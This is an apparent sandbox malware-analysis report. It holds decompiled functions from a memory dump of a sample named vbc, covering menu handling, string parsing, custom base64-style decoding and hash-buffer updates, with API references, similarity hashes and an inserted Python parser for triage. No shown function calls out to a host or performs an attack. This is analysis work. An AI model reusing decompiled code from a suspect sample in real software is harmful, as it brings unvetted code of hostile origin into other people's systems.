                                                                                                                                                    									L24:
                                                                                                                                                    									if(_t42 == _t65) {
                                                                                                                                                    										goto L27;
                                                                                                                                                    									}
                                                                                                                                                    									_t42 = _t63 + 0x25c;
                                                                                                                                                    									if( *_t42 != _t65) {
                                                                                                                                                    										goto L27;
                                                                                                                                                    									}
                                                                                                                                                    									 *_t42 = 1;
                                                                                                                                                    									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                                                                                                                    								}
                                                                                                                                                    								__eflags =  *(_t60 + 0x18) & _t62;
                                                                                                                                                    								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                                                                                    									goto L23;
                                                                                                                                                    								}
                                                                                                                                                    								L22:
                                                                                                                                                    								_t42 = 1;
                                                                                                                                                    								goto L24;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *(_t60 + 0x18) & _t62;
                                                                                                                                                    							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                    						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                                                                                                                    						goto L24;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}

Address column of the listing above: 0x0040b3c4 to 0x0040b539, one entry per decompiled line (entries of 0x00000000 have no mapped code address).

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040B42E
                                                                                                                                                    • SendMessageA.USER32 ref: 0040B472
                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                                                                                    • PostMessageA.USER32 ref: 0040B52F
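The "APIs" block above is the most useful part of each listing for triage: it names the imported calls, the arguments the decompiler recovered as constants, and the call-site address. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample. It assumes the line format shown on this page (`<Api>.<MODULE>[(<arg>,...)], ref: <hex>` with `?` for an unrecovered argument), parses the four lines of this function's block as constructed sample input, groups the calls by module, names the recovered GetMenuStringA arguments (the documented order is hMenu, uIDItem, lpString, cchMax, uFlags, with MF_BYCOMMAND = 0 and MF_BYPOSITION = 0x400), and labels the `0x402` message seen in the decompiled `PostMessageA` call relative to WM_USER (0x400). The helper names are the example's own.

```python
"""Parse the "APIs" block of a Joe Sandbox decompilation listing.

Added example for this page; not code from Joe Sandbox or from the sample.
Assumed input format (taken from the lines shown on the page):
    • <Api>.<MODULE>[(<arg>,<arg>,...)], ref: <hex address>
where an argument is either a hex constant or '?' (not recovered).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the four API reference lines of this function's block.
SAMPLE_API_LINES = """\
• memset.MSVCRT ref: 0040B42E
• SendMessageA.USER32 ref: 0040B472
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
• PostMessageA.USER32 ref: 0040B52F
"""

WM_USER = 0x0400        # documented Win32 base of application-private window messages
MF_BYPOSITION = 0x0400  # GetMenuString flag: uIDItem is a zero-based position; 0 is MF_BYCOMMAND

_LINE_RE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{1,8})\s*$"
)


@dataclass
class ApiRef:
    name: str
    module: str
    args: Optional[List[Optional[int]]]  # None if no arg list is shown; element None for '?'
    ref: int                             # address of the call site


def parse_api_line(line: str) -> ApiRef:
    """Parse one bullet line; raise ValueError if it is not an API reference."""
    m = _LINE_RE.match(line)
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    args: Optional[List[Optional[int]]] = None
    if m.group("args") is not None:
        args = []
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiRef(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def parse_api_block(text: str) -> List[ApiRef]:
    """Parse every non-empty line of an "APIs" block, keeping listing order."""
    return [parse_api_line(ln) for ln in text.splitlines() if ln.strip()]


def calls_by_module(refs: List[ApiRef]) -> Dict[str, List[str]]:
    """Group imported API names by module, preserving first-seen order."""
    out: Dict[str, List[str]] = {}
    for r in refs:
        out.setdefault(r.module, []).append(r.name)
    return out


def describe_menu_string_call(ref: ApiRef) -> str:
    """Name the recovered GetMenuStringA arguments (hMenu, uIDItem, lpString, cchMax, uFlags)."""
    if ref.name != "GetMenuStringA" or ref.args is None or len(ref.args) != 5:
        raise ValueError("expected GetMenuStringA with five arguments")
    _, item, _, cch, flags = ref.args
    if item is None or cch is None or flags is None:
        raise ValueError("uIDItem, cchMax and uFlags must be recovered constants")
    mode = "MF_BYPOSITION" if flags & MF_BYPOSITION else "MF_BYCOMMAND"
    return f"GetMenuStringA(item=0x{item:x}, cchMax={cch}, flags={mode}) at 0x{ref.ref:08x}"


def describe_window_message(code: int) -> str:
    """Label a window-message code relative to WM_USER; 0x0402 from the listing is WM_USER+2."""
    if code >= WM_USER:
        return f"WM_USER+{code - WM_USER}"
    return f"0x{code:04x}"


if __name__ == "__main__":
    refs = parse_api_block(SAMPLE_API_LINES)
    print(calls_by_module(refs))
    print(describe_menu_string_call(refs[2]))
    print(describe_window_message(0x402))
```

The `ref` field is the address the report prints after `ref:`, so parsed records can be joined directly against the decompiled listing, where the same addresses appear in the address column next to each line.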
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                    • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                                                                    • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                                                                                    • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                                                                    • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				signed int _t63;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                    				signed int _t79;
                                                                                                                                                    				void* _t84;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				char* _t98;
                                                                                                                                                    				void* _t100;
                                                                                                                                                    				void* _t102;
                                                                                                                                                    				void* _t104;
                                                                                                                                                    				void* _t106;
                                                                                                                                                    				void* _t107;
                                                                                                                                                    
                                                                                                                                                    				_t84 = __eax;
                                                                                                                                                    				E0040892D(__eax, __eflags);
                                                                                                                                                    				_t86 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_t98 = _a4;
                                                                                                                                                    					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t86 = _t86 + 1;
                                                                                                                                                    					if(_t86 < 1) {
                                                                                                                                                    						continue;
                                                                                                                                                    					}
                                                                                                                                                    					if(strlen(_t98) >= 3) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t79 = atoi(_a4);
                                                                                                                                                    					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                                                                                                                    						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                                                                                    					}
                                                                                                                                                    					L21:
                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                    						_v12 = _v12 | 0x00001000;
                                                                                                                                                    					}
                                                                                                                                                    					_t63 = _v12;
                                                                                                                                                    					 *0x41748c =  *0x41748c + 1;
                                                                                                                                                    					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                                                                                                                    					return _t63;
                                                                                                                                                    				}
                                                                                                                                                    				_t104 = 0;
                                                                                                                                                    				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                                                                                    					L14:
                                                                                                                                                    					_t100 = 0;
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                    					_v8 = 0;
                                                                                                                                                    					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                                                                                    						L20:
                                                                                                                                                    						goto L21;
                                                                                                                                                    					}
                                                                                                                                                    					_t106 = 0;
                                                                                                                                                    					__eflags = 0;
                                                                                                                                                    					do {
                                                                                                                                                    						_v20 = E004069D2(0, _a4);
                                                                                                                                                    						_t67 = E004069D2(0, _a4);
                                                                                                                                                    						__eflags = _v20;
                                                                                                                                                    						if(_v20 >= 0) {
                                                                                                                                                    							L18:
                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _t67;
                                                                                                                                                    						if(_t67 < 0) {
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    						goto L18;
                                                                                                                                                    						L19:
                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                    						_t100 = _t100 + 0x10;
                                                                                                                                                    						_t106 = _t106 + 0x14;
                                                                                                                                                    						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                    					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				_t102 = 0;
                                                                                                                                                    				__eflags = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                                                                                                                    					_push(_a4);
                                                                                                                                                    					_push(_t72);
                                                                                                                                                    					L004115C4();
                                                                                                                                                    					_push(_a4);
                                                                                                                                                    					_v20 = _t72;
                                                                                                                                                    					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                                                                                                                    					_push(_t74);
                                                                                                                                                    					L004115C4();
                                                                                                                                                    					_t107 = _t107 + 0x10;
                                                                                                                                                    					__eflags = _v20;
                                                                                                                                                    					if(_v20 == 0) {
                                                                                                                                                    						L11:
                                                                                                                                                    						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                                                                                                                    						_v16 = 1;
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _t74;
                                                                                                                                                    					if(_t74 != 0) {
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                    					goto L11;
                                                                                                                                                    					L12:
                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                    					_t102 = _t102 + 0x10;
                                                                                                                                                    					_t104 = _t104 + 0x14;
                                                                                                                                                    					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                    				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                                                                                    				__eflags = _v16;
                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                    					goto L20;
                                                                                                                                                    				}
                                                                                                                                                    				goto L14;
                                                                                                                                                    			}
                                                                                                                                                    0x0040a120
                                                                                                                                                    0x0040a122
                                                                                                                                                    0x0040a127
                                                                                                                                                    0x0040a129
                                                                                                                                                    0x0040a12c
                                                                                                                                                    0x0040a12c
                                                                                                                                                    0x0040a136
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a138
                                                                                                                                                    0x0040a13c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a148
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a14d
                                                                                                                                                    0x0040a155
                                                                                                                                                    0x0040a176
                                                                                                                                                    0x0040a176
                                                                                                                                                    0x0040a257
                                                                                                                                                    0x0040a25c
                                                                                                                                                    0x0040a25e
                                                                                                                                                    0x0040a25e
                                                                                                                                                    0x0040a26b
                                                                                                                                                    0x0040a26e
                                                                                                                                                    0x0040a274
                                                                                                                                                    0x0040a27c
                                                                                                                                                    0x0040a27c
                                                                                                                                                    0x0040a17f
                                                                                                                                                    0x0040a181
                                                                                                                                                    0x0040a188
                                                                                                                                                    0x0040a18b
                                                                                                                                                    0x0040a18e
                                                                                                                                                    0x0040a1f2
                                                                                                                                                    0x0040a1f2
                                                                                                                                                    0x0040a1f4
                                                                                                                                                    0x0040a1fa
                                                                                                                                                    0x0040a1fd
                                                                                                                                                    0x0040a255
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a256
                                                                                                                                                    0x0040a1ff
                                                                                                                                                    0x0040a1ff
                                                                                                                                                    0x0040a201
                                                                                                                                                    0x0040a21f
                                                                                                                                                    0x0040a224
                                                                                                                                                    0x0040a229
                                                                                                                                                    0x0040a22f
                                                                                                                                                    0x0040a235
                                                                                                                                                    0x0040a23e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a23e
                                                                                                                                                    0x0040a231
                                                                                                                                                    0x0040a233
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a241
                                                                                                                                                    0x0040a241
                                                                                                                                                    0x0040a247
                                                                                                                                                    0x0040a24a
                                                                                                                                                    0x0040a24d
                                                                                                                                                    0x0040a24d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a201
                                                                                                                                                    0x0040a190
                                                                                                                                                    0x0040a190
                                                                                                                                                    0x0040a192
                                                                                                                                                    0x0040a198
                                                                                                                                                    0x0040a19c
                                                                                                                                                    0x0040a19f
                                                                                                                                                    0x0040a1a0
                                                                                                                                                    0x0040a1a5
                                                                                                                                                    0x0040a1a8
                                                                                                                                                    0x0040a1ae
                                                                                                                                                    0x0040a1b2
                                                                                                                                                    0x0040a1b3
                                                                                                                                                    0x0040a1b8
                                                                                                                                                    0x0040a1bb
                                                                                                                                                    0x0040a1bf
                                                                                                                                                    0x0040a1c5
                                                                                                                                                    0x0040a1ce
                                                                                                                                                    0x0040a1d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a1d1
                                                                                                                                                    0x0040a1c1
                                                                                                                                                    0x0040a1c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a1d8
                                                                                                                                                    0x0040a1d8
                                                                                                                                                    0x0040a1de
                                                                                                                                                    0x0040a1e1
                                                                                                                                                    0x0040a1e4
                                                                                                                                                    0x0040a1e4
                                                                                                                                                    0x0040a1ec
                                                                                                                                                    0x0040a1f0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                                                                                      • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                                                                                    • strlen.MSVCRT ref: 0040A13F
                                                                                                                                                    • atoi.MSVCRT ref: 0040A14D
                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                    • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                                                                    • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                                                                                    • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                                                                    • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00410E8A(char* __eax, void* __edi) {
                                                                                                                                                    				unsigned int _v5;
                                                                                                                                                    				signed int _v6;
                                                                                                                                                    				signed int _v7;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                    				char* _t56;
                                                                                                                                                    				signed char _t57;
                                                                                                                                                    				char* _t67;
                                                                                                                                                    				void* _t68;
                                                                                                                                                    				void* _t69;
                                                                                                                                                    
                                                                                                                                                    				_t68 = __edi;
                                                                                                                                                    				_t56 = __eax;
                                                                                                                                                    				_t69 = 0;
                                                                                                                                                    				_t37 = strlen(__eax) + 0xfffffffd;
                                                                                                                                                    				_v16 = _t37;
                                                                                                                                                    				if(_t37 < 0) {
                                                                                                                                                    					L18:
                                                                                                                                                    					 *((char*)(_t69 + _t68)) = 0;
                                                                                                                                                    					return _t69;
                                                                                                                                                    				}
                                                                                                                                                    				_v12 = 0xfffffffe;
                                                                                                                                                    				_v12 = _v12 - _t56;
                                                                                                                                                    				_t5 = _t56 + 2; // 0x411004
                                                                                                                                                    				_t67 = _t5;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_t6 = _t67 - 2; // 0x75fff88b
                                                                                                                                                    					_t39 =  *_t6;
                                                                                                                                                    					if( *_t6 != 0x2e) {
                                                                                                                                                    						_v6 = E00410E56(_t39);
                                                                                                                                                    					} else {
                                                                                                                                                    						_v6 = 0x3e;
                                                                                                                                                    					}
                                                                                                                                                    					_t9 = _t67 - 1; // 0xfc75fff8
                                                                                                                                                    					_t41 =  *_t9;
                                                                                                                                                    					if( *_t9 != 0x2e) {
                                                                                                                                                    						_v5 = E00410E56(_t41);
                                                                                                                                                    					} else {
                                                                                                                                                    						_v5 = 0x3e;
                                                                                                                                                    					}
                                                                                                                                                    					_t43 =  *_t67;
                                                                                                                                                    					if( *_t67 != 0x2e) {
                                                                                                                                                    						_t57 = E00410E56(_t43);
                                                                                                                                                    					} else {
                                                                                                                                                    						_t57 = 0x3e;
                                                                                                                                                    					}
                                                                                                                                                    					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                                                                                                                    					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                                                                                                                    						_v7 = E00410E56(_t45);
                                                                                                                                                    					} else {
                                                                                                                                                    						_v7 = 0x3e;
                                                                                                                                                    					}
                                                                                                                                                    					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                                                                                                    					if( *_t67 == 0x2d) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                                                                                                                    					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                                                                                                                    						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                                                                                                                    						_t34 = _t69 + 2; // 0x2
                                                                                                                                                    						return _t34;
                                                                                                                                                    					}
                                                                                                                                                    					_t69 = _t69 + 3;
                                                                                                                                                    					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                                                                                                                    					_t25 = _t69 + 5; // 0x2
                                                                                                                                                    					_t67 = _t67 + 4;
                                                                                                                                                    					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                                                                                                                    						goto L18;
                                                                                                                                                    					} else {
                                                                                                                                                    						continue;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				 *(_t69 + _t68 + 1) = 0;
                                                                                                                                                    				_t31 = _t69 + 1; // 0x1
                                                                                                                                                    				return _t31;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen
                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                    • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                                                                    • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                                                                                    • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                                                                    • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                                                                                                                    				unsigned int _t23;
                                                                                                                                                    				signed int _t25;
                                                                                                                                                    				unsigned int _t34;
                                                                                                                                                    				unsigned int _t36;
                                                                                                                                                    				void* _t40;
                                                                                                                                                    				unsigned int _t45;
                                                                                                                                                    				void* _t46;
                                                                                                                                                    				int _t47;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				void* _t50;
                                                                                                                                                    
                                                                                                                                                    				_t48 = __ecx;
                                                                                                                                                    				_t34 = __eax;
                                                                                                                                                    				_t23 =  *(__ecx + 0x10);
                                                                                                                                                    				_t36 = _t23 + __eax * 8;
                                                                                                                                                    				 *(__ecx + 0x10) = _t36;
                                                                                                                                                    				if(_t36 < _t23) {
                                                                                                                                                    					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                                                                                                                    				}
                                                                                                                                                    				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                                                                                                                    				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                                                                                                                    				if(_t25 == 0) {
                                                                                                                                                    					L6:
                                                                                                                                                    					if(_t34 >= 0x40) {
                                                                                                                                                    						_t45 = _t34 >> 6;
                                                                                                                                                    						do {
                                                                                                                                                    							memcpy(_t48 + 0x18, _a4, 0x40);
                                                                                                                                                    							_t50 = _t50 + 0xc;
                                                                                                                                                    							E0040BD8A(_t48 + 0x18, _t48);
                                                                                                                                                    							_a4 = _a4 + 0x40;
                                                                                                                                                    							_t34 = _t34 - 0x40;
                                                                                                                                                    							_t45 = _t45 - 1;
                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t34);
                                                                                                                                                    					_push(_a4);
                                                                                                                                                    					_push(_t48 + 0x18);
                                                                                                                                                    				} else {
                                                                                                                                                    					_t46 = 0x40;
                                                                                                                                                    					_t47 = _t46 - _t25;
                                                                                                                                                    					_t40 = _t48 + 0x18 + _t25;
                                                                                                                                                    					if(_t34 >= _t47) {
                                                                                                                                                    						memcpy(_t40, _a4, _t47);
                                                                                                                                                    						_t50 = _t50 + 0xc;
                                                                                                                                                    						E0040BD8A(_t48 + 0x18, _t48);
                                                                                                                                                    						_a4 = _a4 + _t47;
                                                                                                                                                    						_t34 = _t34 - _t47;
                                                                                                                                                    						goto L6;
                                                                                                                                                    					} else {
                                                                                                                                                    						_push(_t34);
                                                                                                                                                    						_push(_a4);
                                                                                                                                                    						_push(_t40);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return memcpy();
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                    • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                                                                    • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                                                                                    • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                                                                    • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				signed int _t21;
                                                                                                                                                    				signed int _t23;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    				signed int _t31;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    				void* _t44;
                                                                                                                                                    				signed int _t46;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				signed int _t51;
                                                                                                                                                    				int _t52;
                                                                                                                                                    				void** _t53;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    
                                                                                                                                                    				_t53 = __esi;
                                                                                                                                                    				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                    				_t51 =  *_t1;
                                                                                                                                                    				_t21 = 0;
                                                                                                                                                    				if(_t51 <= 0) {
                                                                                                                                                    					L4:
                                                                                                                                                    					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                    					_t33 =  *_t53;
                                                                                                                                                    					_t23 =  *_t2 + _t51;
                                                                                                                                                    					_t46 = 8;
                                                                                                                                                    					_t53[1] = _t23;
                                                                                                                                                    					_t24 = _t23 * _t46;
                                                                                                                                                    					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                    					 *_t53 = _t24;
                                                                                                                                                    					memset(_t24, 0,  *_t10 << 3);
                                                                                                                                                    					_t52 = _t51 << 3;
                                                                                                                                                    					memcpy( *_t53, _t33, _t52);
                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                    						_push(_t33);
                                                                                                                                                    						L004115D6();
                                                                                                                                                    					}
                                                                                                                                                    					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                                                    					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t44 =  *__esi;
                                                                                                                                                    					_t48 = _t44;
                                                                                                                                                    					while( *_t48 != 0) {
                                                                                                                                                    						_t21 = _t21 + 1;
                                                                                                                                                    						_t48 = _t48 + 8;
                                                                                                                                                    						_t58 = _t21 - _t51;
                                                                                                                                                    						if(_t58 < 0) {
                                                                                                                                                    							continue;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L4;
                                                                                                                                                    						}
                                                                                                                                                    						goto L7;
                                                                                                                                                    					}
                                                                                                                                                    					_t31 = _t21 << 3;
                                                                                                                                                    					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                                                    					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                    				}
                                                                                                                                                    				L7:
                                                                                                                                                    				return 1;
                                                                                                                                                    			}
                                                                                                                                                    0x00406fff
                                                                                                                                                    0x00406fff
                                                                                                                                                    0x00406fe8
                                                                                                                                                    0x00406fec

APIs
